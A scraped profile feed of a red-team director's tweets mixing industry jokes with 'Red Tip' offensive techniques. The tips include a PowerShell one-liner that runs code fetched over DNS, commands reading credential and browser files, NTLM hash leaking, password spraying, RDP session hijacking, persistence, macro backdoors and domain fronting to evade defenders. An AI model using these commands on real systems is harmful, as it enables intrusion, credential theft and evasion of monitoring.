Vincent Yiu Profile Banner
Vincent Yiu Profile
Vincent Yiu

@vysecurity

Followers
27,324
Following
204
Media
1,150
Statuses
32,127

Follow me for Cybersecurity #Thought #Leadership . Director Red Team. Help organizations safeguard their businesses from the bad guys.

Joined December 2014
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
Pinned Tweet
@vysecurity
Vincent Yiu
1 year
What on Earth do people do with 96GB RAM? Open like 32 instances of BloodHound neo4j databases?
225
40
556
@vysecurity
Vincent Yiu
6 years
Took all those "Red Team Tips" and stuck it onto one page: I'll update this page occasionally #redteam #adversarysimulation #cyber Also, I want to add that there's some duplicate numbering :( Ah well...
17
607
1K
@vysecurity
Vincent Yiu
3 years
Sent a PR to EDRs hook repository to visualize and quickly reference which APIs are hooked.
Tweet media one
11
312
851
@vysecurity
Vincent Yiu
2 months
The fuck, what kind of vulnerability is CVE-2023–24044? You can modify the host header so that it redirects to the attacker's domain instead. What is this bullshit? How did it even get a CVE?
67
100
849
@vysecurity
Vincent Yiu
2 years
What do people do with 64 GB RAM on a laptop?
764
32
788
@vysecurity
Vincent Yiu
7 years
Exploit CVE-2017-8759 without Macros or any interaction. Simply click on the infected file and boom code execution.
12
508
741
@vysecurity
Vincent Yiu
1 year
@stillgray Just floor him. Why’s the guy wasting time?
36
4
661
@vysecurity
Vincent Yiu
6 years
Red tip #333 : One liner to grab all cleartext WiFi passwords:
Tweet media one
10
266
657
@vysecurity
Vincent Yiu
1 year
Common persistence mechanisms for Linux /etc/rc.local /etc/init.d/ /etc/profile /etc/crontab /etc/cron.d/ /etc/cron.hourly/ /etc/cron.daily/ /etc/cron.weekly/ /etc/cron.monthly/ /etc/cron.yearly/ Startup Applications Systemd Services .bashrc .bash_profile .bash_logout
11
127
646
@vysecurity
Vincent Yiu
3 years
Red Tip #434 : SSH Agent Forwarding can be exploited to advance your presence on a network without SSH keys or passwords. @int0x08 has an example command snippet available at . Great for when you have a shell but no credentials. #redteam #cyber #sshagent
Tweet media one
6
169
568
@vysecurity
Vincent Yiu
2 years
When you need a calculator do you just type Python3?
93
26
560
@vysecurity
Vincent Yiu
1 year
Red Team 2.0 appears to become: 1) Give a machine on the internal network because phish fail. 2) Disable EDR because can't seem to bypass the EDR. 3) Can't figure out how to pivot network segment. 4) ... Dude, why not just ask to be put on the core banking system?
43
66
468
@vysecurity
Vincent Yiu
1 year
Common persistence mechanisms for Windows. 1. Registry 2. Startup folder 3. Group Policy Objects 4. Task Scheduler 5. Windows Services 6. Scheduled Tasks 7. AutoRun registry keys 8. Security Support Provider 9. Userinit registry key 10. AppInit registry key.
9
99
453
@vysecurity
Vincent Yiu
3 years
Bypass Cloudflare using Workers: Technically, couldn't you now use this technique to scan tons of websites for exposed content to the CloudFlare CDN?
5
157
453
@vysecurity
Vincent Yiu
3 months
Alternatives to the Whoami.exe command. echo %USERNAME% echo %USERDOMAIN% systeminfo wmic ComputerSystem get Username net user %username% query user cd /users; dir reg query “hkcu\volatile environment”
6
87
442
@vysecurity
Vincent Yiu
1 year
@LisaMayOfficial @FightHaven The store lost $100 in cash when the man stole the $100 bill from the register. However, when the man used the stolen $100 bill to buy $70 worth of goods and received $30 in change, the store did not lose any additional money. So, the total amount the store lost was $100 due to…
61
2
415
@vysecurity
Vincent Yiu
5 years
Infosec tip: having the right Twitter feed saves you tens of thousands of USD in course fees. 😅
11
71
408
@vysecurity
Vincent Yiu
2 years
Life of a Red Teamer. Client: "Is it you? Did you guys run calculator?"
9
48
392
@vysecurity
Vincent Yiu
5 years
Red Tip #344 : Set HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0, to allow multiple sessions on a server per user. This is useful if you want to login to the jump-host, but that guy's just on all-day-long... 😶
5
131
394
@vysecurity
Vincent Yiu
3 years
Red Tip #429 : Looking for login credentials? Don't forget to try default credentials other than admin:admin -> . A fantastic cheat sheet containing major default credentials to try for various products. #redteam #cyber
2
135
388
@vysecurity
Vincent Yiu
10 months
@NoelleKos @PicturesFoIder New laptop New car New book New gold bars
7
1
365
@vysecurity
Vincent Yiu
1 year
Wtf… we’re screwed.
Tweet media one
Tweet media two
6
63
335
@vysecurity
Vincent Yiu
6 years
Hackers don't care about policies, or your compliance.
17
89
310
@vysecurity
Vincent Yiu
1 year
Why is Red Teaming so undervalued? Is it just me? Blue teams are implementing controls that don't work like 80% of the time for tens of millions of dollars. Yet most orgs are skimping out on paying for Red Team who's going to tell you what went wrong?
69
38
311
@vysecurity
Vincent Yiu
6 years
As some people are asking about Domain Fronting and how to find domains, here's a list I've made: and another post
1
157
309
@vysecurity
Vincent Yiu
9 months
Why I quit Bug Bounty and I'm constantly being reminded: Get paid fucking 10 USD for an Authentication Bypass + Remote Code Execution Chain, that can be used to attack their Domain Controllers.
20
17
307
@vysecurity
Vincent Yiu
5 years
Guess what, you know when you type 1 word into Chrome, and it goes off on a search? Windows also makes a NBNS + LLMNR request for that 1 word. Great.
Tweet media one
Tweet media two
8
127
299
@vysecurity
Vincent Yiu
6 years
has tons of domain data for your pentesting needs :)
5
105
296
@vysecurity
Vincent Yiu
3 years
Pretty cool Red Team game:
Tweet media one
7
77
302
@vysecurity
Vincent Yiu
3 years
Red Tip #437 : Pwndrop is a customized web and webdav server that can be used to serve documents and payloads with a few extra features. @kgretzky made a fantastic GUI and its super easy to use! . Video at #redteam #cybersecurity
Tweet media one
5
77
295
@vysecurity
Vincent Yiu
5 years
Oh oh... oh...
8
125
293
@vysecurity
Vincent Yiu
3 years
YOLO, I joined Cyber not even knowing how the TCP stack really worked, or how IP Networking worked. University was all text books. OSCP just pushed me into more practical execution and understanding through testing / trial and error.
13
21
291
@vysecurity
Vincent Yiu
5 years
Red Tip #345 : When placing Excel Macro backdoors into Excel startup, you don't have to name it Personal.xlsb, you can also call it a.txt. It'll still start up upon opening of Excel. 😊... Bonus point for sticking it into Roaming profile.
Tweet media one
2
96
293
@vysecurity
Vincent Yiu
1 year
Trick to use any Cloudflare website to get your egress IP. Access the https://<website>/cdn-cgi/trace, and grep "ip".
4
54
290
@vysecurity
Vincent Yiu
5 years
Domain Fronting using via. method over DNS over HTTPS.
Tweet media one
3
118
286
@vysecurity
Vincent Yiu
4 years
Red Team: Shad0w, a post-exploitation framework designed to operate covertly on heavily monitored environments.
3
112
283
@vysecurity
Vincent Yiu
5 years
:D Who's interested in a way to get a shell once you have the target's low privileged Office365 credentials?
29
50
278
@vysecurity
Vincent Yiu
2 years
Table top scenario: There’s a breach and 30 employees got phished. All SOC AD accounts are locked out and we can’t get back in.
69
39
273
@vysecurity
Vincent Yiu
5 years
type C:\users\%username%\appdata\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
8
72
269
@vysecurity
Vincent Yiu
8 months
DevTunnels, blue are going to begin searching for . Get ready ahead of time and use domains like: global.rel.tunnels.api.visualstudio\.com tunnels-prod-rel-tm.trafficmanager\.net *.app\.github.dev
6
91
269
@vysecurity
Vincent Yiu
3 years
In case you need a quick Macro string obfuscation:
Tweet media one
4
60
260
@vysecurity
Vincent Yiu
3 years
Neat command from Ippsec :D find / -newermt "2021-02-12" -newermt "2021-02-19" -ls| grep -v ' /etc\| /var/lib\| /sys\| /proc\| /boot' It finds files from when a box was created then finds stuff the author of a box planted for the CTF :D
Tweet media one
5
54
258
@vysecurity
Vincent Yiu
5 years
If you wanted to extract ATT&CK Threat groups to Techniques, this script I mashed together works great for getting it into CSV before Matrixing:
2
81
254
@vysecurity
Vincent Yiu
3 years
Red Tip #427 : Directory discovery for all your URLs in one command, formatted to a nice HTML file for browsing. You can try other formats for grepping etc. ffuf -w targets-alive.txt:URL -w wordlist.txt -u URL/FUZZ -mc 200,403 -o targets-report.html -of html #recon #cyber
Tweet media one
3
67
250
@vysecurity
Vincent Yiu
4 years
Red Tip #425 : CVE-2020-16938 allows privileged file read by EVERYBODY according to @jonasLyk You can PoC using 7zip and navigating to the device path \\.\PhysicalDevice0\Basic data partition.img\Windows\System32\Config\ #redteam #cyber
Tweet media one
1
92
250
@vysecurity
Vincent Yiu
3 years
Red Team Tip? Need random IP addresses to do something quick? has you covered.
7
58
251
@vysecurity
Vincent Yiu
3 years
Imagine trying to detect LOLBINs, then your sysadmins are like sticking commands like this into LOGON scripts.
Tweet media one
11
55
252
@vysecurity
Vincent Yiu
6 years
Red tip #325 : WPA2 PSK can be cracked on Hashcat too, just in case you were not aware. All you do is make cap2hccapx then convert the handshake CAP file to HCCAPX then crack it in Hashcat mode 2500 :)
6
102
249
@vysecurity
Vincent Yiu
5 years
Red Tip #337 : Have a low privileged Office365 account? Pivot over to after logging in and you can access the Azure AD. If they're syncing AD you suddenly get to view all the groups. Also check out Azure CLI. From @ustayready 's @WWHackinFest talk!
1
110
243
@vysecurity
Vincent Yiu
6 years
Red tip #303 : Look for open S3 buckets using I found 1400 buckets in about 1 hour. Good practice to make sure your client isn’t vulnerable to such attacks and if In red team you might be able to use it to serve payload stages or create waterhole attacks
3
120
239
@vysecurity
Vincent Yiu
3 years
Red Tip #435 : Found GitLab but no credentials? That pesky sign-in page is blocking you off? Try navigate to /explore or /explore/snippets to see if there's anything useful. #Redteam #GitLabSnippets
Tweet media one
2
62
240
@vysecurity
Vincent Yiu
5 years
What's the best UAC bypass to use now?
15
51
235
@vysecurity
Vincent Yiu
4 years
Red Tip #421 : Do you know how to trivially & remotely hijack an #RDP session without prompt nor warning on user’s side using #Microsoft signed binary (no patch/multi-session) ? qwinsta+mstsc shadowing is the answer ;) Details: @kmkz_security
2
74
238
@vysecurity
Vincent Yiu
5 years
Red Tip #343 : When working with Google Drive documents, if it asks you to request permission, you can try. However, you can also try sticking /pubhtml at the end to see if they've published a copy that you can view.
2
68
231
@vysecurity
Vincent Yiu
3 years
Red Tip #436 : ProjectDiscovery have a tool called Nuclei which has constantly community-updated signatures which help to quickly identify the low hanging fruit and fingerprint a perimeter if you don't want to go full on vulnerability scanner: #cyber
Tweet media one
2
38
230
@vysecurity
Vincent Yiu
4 years
Red Tip #415 : STATUS_PASSWORD_MUST_CHANGE when trying an AD account? Use “smbpasswd -r domain.fqdn -U username” to change the password so you can use the account. #cyber #redteam
Tweet media one
0
79
229
@vysecurity
Vincent Yiu
2 years
Just saw the 50th company running: subfinder -d $1 | httpx | gospider | nuclei. Calls it AI, next gen.
13
18
220
@vysecurity
Vincent Yiu
6 years
Red tip #328 : Need to Spray Office365? Use . Tried and tested this tool and works really fast and well in Python. Just do --threads 3000 and --password Welcome1. As all operators know, you don't have time to be testing tools in the middle of a gig. :)
0
78
220
@vysecurity
Vincent Yiu
2 years
Red Team. Do you invite the target out for coffee?
46
11
217
@vysecurity
Vincent Yiu
3 years
Red / Blue Team Tip: If you're still reading e-mail message headers using Notepad, you're doing it wrong. Check out Message Header Analyzer: It'll save your eyes 🤯 #cyber #redteam #blueteam #suspiciousemails
12
51
218
@vysecurity
Vincent Yiu
6 years
Getting started with Threat Hunting: 1) Install Splunk 2) Sysmon all the endpoints using GPO 3) Send all logs to Splunk using Sysmon TA 4) Run saved queries :D
13
64
212
@vysecurity
Vincent Yiu
6 years
I just published “DomLink — Automating domain discovery”
6
112
206
@vysecurity
Vincent Yiu
4 years
Red Tip #423 : Escalate privileges on a Windows system if you have any of the following privileges. SeImpersonate, SeAssignPrimary, SeTcb, SeBackup, SeRestore, SeCreateToken, SeLoadDriver, SeTakeOwnership, SeDebug @elc0rr3Km1n0s #cyber #redteam
1
50
208
@vysecurity
Vincent Yiu
7 years
This is just awesome. Nice work guys.
6
127
205
@vysecurity
Vincent Yiu
3 years
Ransomware defense. Every EDR company telling people to install EDR but in reality their EDR probably won’t even detect AnyDesk. You should be red teaming instead.
21
29
198
@vysecurity
Vincent Yiu
4 years
Red Tip #402 : Need to proxy Linux tools? Proxychains4. Need to proxy Windows tools like ADExplorer or Remote Desktop? Try out Proxycap, Proxifier. #cyber #operations #redteam
Tweet media one
4
77
201
@vysecurity
Vincent Yiu
4 years
Neat trick with Windows when you want to leave SSH tunnels in the background. #bash #screen -S tunnel #ssh -L 8080:localhost:8080 Close terminal. Stays running :)
7
62
196
@vysecurity
Vincent Yiu
4 years
1. The cloud is just someone else’s computer. 2. When that someone tells you they can’t view your data, all they mean is they have a rule to say they shouldn’t. Rarely a technical control to prevent it.
8
54
191
@vysecurity
Vincent Yiu
4 years
Red Tip #404 : Perform easy phishing campaign and obtain a list of users who clicked. Send a follow up email from a training platform and ask them to perform their awareness training by launching an application. Idea is that multi-stage phishing is more convincing. #cyber #redteam
Tweet media one
2
55
188
@vysecurity
Vincent Yiu
3 years
Using CloudFlare for IP address filtering in Red Team Operations: Wrote it up for reference, and because CloudFlare is pretty awesome. You can also play around with the other features! 🔥 (cc @curi0usjack , @shantanukhande ) #redteam #cybersecurity
Tweet media one
4
81
188
@vysecurity
Vincent Yiu
6 years
Red tip #320 : List Chrome bookmarks with one line: type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type" Thank @francisacer1 for the path to Bookmarks.bak :D
2
56
187
@vysecurity
Vincent Yiu
6 years
Red tip #310 : SOC is looking for low user/access count new domains that haven't been seen before and you can't domain front due to RFC2616 proxy? When doing the phish, add invisible image links to your C2 domain so that multiple users will have loaded the C2 domain before use.
4
64
187
@vysecurity
Vincent Yiu
4 years
Red Tip #422 : Identify if a certain domain is hosted on s3 bucket by requesting ‘/%C0’. It’ll spit out a 400 bad request if it’s an S3 bucket with a similar message as shown in the screenshot. #redteam #cyber
Tweet media one
5
48
187
@vysecurity
Vincent Yiu
6 years
CVE-2018-8120 Windows LPE PoC
0
105
183
@vysecurity
Vincent Yiu
6 years
Just in case you need to leak a hash over a port other than TCP 445 you have "rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM"
0
77
176
@vysecurity
Vincent Yiu
6 years
Red tip #282 : Although I thought it was clear as Microsoft documented it but LAPS passwords are in clear text to users that have the right privileges in AD. Friendly reminder :) Either just browse LDAP or or @harmj0y @kfosaaen
4
76
180
@vysecurity
Vincent Yiu
5 years
A new update to the ATT&CK Group to Technique repository! @msgeekuk has given us a lot of fancy changes in the Spreadsheet, and we also have color coding. Get the repository at
Tweet media one
Tweet media two
Tweet media three
4
79
178
@vysecurity
Vincent Yiu
5 years
OK, best payload initiation vectors. Eg. DOC Macro, Excel Macro, HTA, VBS, JS, SLK, What else...?
23
41
177
@vysecurity
Vincent Yiu
6 years
I've got to say but one of my favourite commands to date is: powershell Get-WmiObject -Class MicrosoftDNS_AType -NameSpace Root\MicrosoftDNS -ComputerName DCNAME
5
46
176
@vysecurity
Vincent Yiu
5 years
[NEW POST] HAMMERTHROW: Rotate my domain. Automating the process of changing staging and beacon domains in @armitagehacker 's CobaltStrike. This makes it more difficult for defenders to detect all domains in use. #redteam
3
103
172
@vysecurity
Vincent Yiu
6 years
Red tip #274 : Password cracking is hard. I love Top297Million-Probable, rockyou was decent for a quick smash, but lately found out about Keyboard Walks. Add keyboard walks with rules into your cracking routines to get more hashes cracked! Share your ideas!
7
70
171
@vysecurity
Vincent Yiu
3 years
Given the feedback from some of the companies who run the products on the list, here’s a revamped version without certain products. Let’s hope everyone can learn to maximise coverage using multiple products or understand the scope of their EDR’s coverage. Cc @MrUn1k0d3r #redteam
Tweet media one
5
76
172
@vysecurity
Vincent Yiu
6 years
How do you prevent a zero day exploit attack? You don't. You block the next step of the attack to minimise the impact of the zero day. If you have many layers of controls, it minimises the impact of the zero day. Good network segmentation and endpoint / server controls etc.
4
76
168
@vysecurity
Vincent Yiu
3 years
Send phish to 10 companies, get 30 shells, 7 minutes in. Shell overload is a big problem. Why’s no one talked about shell overload problems?
13
15
165
@vysecurity
Vincent Yiu
6 years
Red tip #284 : Windows Credential Vault is often used to store saved passwords. @_rastamouse walks us through the decryption procedures required to make use of these credentials in his blog post at !
2
76
165
@vysecurity
Vincent Yiu
6 years
[NEW POST] For the #RedTeam who use CloudFront for Domain Fronting. Similar to Aliyun, set arbitrary host headers :) Check this out. As always, I confirm any techniques and findings using @armitagehacker Cobalt Strike. cc @bluscreenofjeff @001spartan
4
74
163
@vysecurity
Vincent Yiu
7 years
No need for IEX cc @MDSecLabs : powershell -ep bypass -nop -c "powershell . ((nslookup.exe -q=txt ))[5]"
5
99
161
@vysecurity
Vincent Yiu
6 years
Red tip #315 : If you HAVE to spray for creds, use Kerberos spraying as pointed out by @ropnop that the level of auditing is far less by default and does not log invalid attempts.
1
58
160
@vysecurity
Vincent Yiu
3 years
Why I see myself as a hacker more than a developer. Part 1. 1) I write code that barely works, not factored, not optimized. 2) I write obfuscation better than I write code. 3) I still can't get a proper UI going. 4) My code achieves the task, only.
8
20
160
@vysecurity
Vincent Yiu
6 years
Red tip #321 : Want to find out if the current network has an external exposed interface? Eg. Wireless networks? An easy way is to visit on port 22,80,443 for a quick idea. You might find that your current network has another way in!
4
57
157
@vysecurity
Vincent Yiu
3 years
Is it wrong to be passionate about cyber security?
17
7
148
@vysecurity
Vincent Yiu
6 years
New blog post on using Alibaba CDN for domain fronting, and some of it's benefits. #redteam #security My examples use @armitagehacker 's Cobalt Strike, but you can use any other C2 software.
1
85
148